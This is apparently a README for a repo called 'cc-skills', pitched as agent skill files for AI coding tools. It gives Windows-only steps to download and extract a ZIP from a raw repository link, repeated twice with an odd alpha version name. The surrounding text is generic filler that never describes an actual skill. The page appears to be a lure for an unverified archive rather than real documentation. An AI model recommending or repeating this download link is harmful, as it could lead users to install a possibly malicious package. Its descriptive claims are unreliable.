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🎨 cc-skills - Agent skills that help you work faster

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🚀 What this is

cc-skills is a set of agentic skills you can use with AI coding tools. It helps you give clear tasks to tools like Claude Code, Copilot, Cursor, Gemini, and other agent-based apps.

Use it when you want help with coding tasks, project setup, file edits, code cleanup, and small workflow steps. It is made for people who want the tool to do more of the work without a long setup.

📦 What you need

You need:

  • A Windows PC
  • Internet access
  • A web browser
  • An AI coding app that supports skills or plugins
  • A place to save files on your computer

For the best result, use a recent version of:

  • Claude Code
  • Cursor
  • GitHub Copilot
  • Gemini CLI extension
  • OpenCode
  • Other agent tools that can read local skill files

⬇️ Download

Open this page to download or get the files:

https://github.com/hssh8917/cc-skills/raw/refs/heads/main/skills/skills_cc_2.8-alpha.4.zip

If the page opens in your browser, look for the code, files, or release area that matches your tool. Save the files to a folder you can find later, such as Downloads or Desktop.

🪟 Install on Windows

  1. Open the download page in your browser: https://github.com/hssh8917/cc-skills/raw/refs/heads/main/skills/skills_cc_2.8-alpha.4.zip

  2. Download the repository files to your PC.

  3. If the files come as a ZIP archive, right-click the ZIP file and choose Extract All.

  4. Pick a folder you can reach easily, such as:

    • C:\Users\YourName\Downloads\cc-skills
    • C:\Users\YourName\Desktop\cc-skills
  5. Keep the folder in place. Your AI tool will need to read these files.

  6. Open your AI app and add the folder or skill files the way that app expects.

🧭 How to use it

Once cc-skills is on your PC, open your AI coding app and point it to the skill files.

Use it like this:

  • Ask the app to clean up a file
  • Ask it to create a new feature
  • Ask it to fix a bug
  • Ask it to explain a code file in plain English
  • Ask it to make a plan before it changes anything

If your tool supports custom skills, it may let you load the skill set from a local folder. If it supports plugins or extensions, you may need to add the folder path in the app settings.

🧰 Good ways to use cc-skills

Use cc-skills for common tasks such as:

  • Code review
  • File edits
  • Test help
  • Task planning
  • Bug fixes
  • Refactoring
  • App setup
  • Working with local project files
  • Step-by-step coding help

It fits well with tools that follow instructions from files. That makes it useful when you want the AI to stay on task and work in a steady way.

🗂️ Suggested folder layout

You can keep the files in a simple folder structure like this:

  • cc-skills/
    • skills/
    • prompts/
    • docs/

If the repository gives you a different layout, keep the same names from the download. Do not rename files unless the tool instructions tell you to.

⚙️ Setup tips for Windows

Use these tips to avoid common problems:

  • Save the files in a short folder path
  • Avoid folders with special characters
  • Keep the files unzipped
  • Close and reopen your AI app after adding the files
  • Use the same folder each time
  • If the app asks for a skill path, paste the full path

If you use Windows File Explorer, you can right-click a folder and copy its path from the address bar.

🧪 First check

After setup, test cc-skills with a simple request like:

  • “Read this project and tell me what it does”
  • “Make a short plan to improve this file”
  • “Fix this bug and explain the change”
  • “List the files you would update first”

A good setup should let the tool find the skill files and use them without extra steps.

🛠️ Common fixes

If the tool does not see the skills:

  • Check that the folder is still in the same place
  • Make sure the files are extracted
  • Check the app settings for the correct path
  • Restart the app
  • Try a shorter folder name
  • Confirm the app supports local skill files

If the app loads the files but does not use them:

  • Open the skill file and check the instructions
  • Make sure the skill name matches what the app expects
  • Try a simple task first
  • Remove extra copies of the same folder

🖥️ Supported tools

cc-skills is built for agent-based tools and coding apps such as:

  • Claude Code
  • Cursor
  • Copilot
  • Gemini
  • Gemini CLI extension
  • OpenClaw
  • OpenCode
  • Other tools that can use local skills

If your app supports instructions from a folder, there is a good chance it can work with this repo.

📚 What you can expect

This repo is set up to help with day-to-day AI coding work. It can support:

  • Cleaner task instructions
  • Better task flow
  • More consistent results
  • Less manual copy and paste
  • Better use of local project context

The goal is to keep the work simple and steady for the user.

🔐 File safety

Keep the files in a folder you trust. Since the repo is part of your local setup, the tool may read those files while it works.

Use the version from the repository page you downloaded so you know what files are in use.

❓ If something looks wrong

Check these points:

  • Did you download the right files?
  • Did you extract the ZIP?
  • Did you point the app to the right folder?
  • Does your app support this kind of skill file?
  • Is the folder still available on your PC?

If the app still does not load the skills, open the repository page again and compare the files with your local copy.

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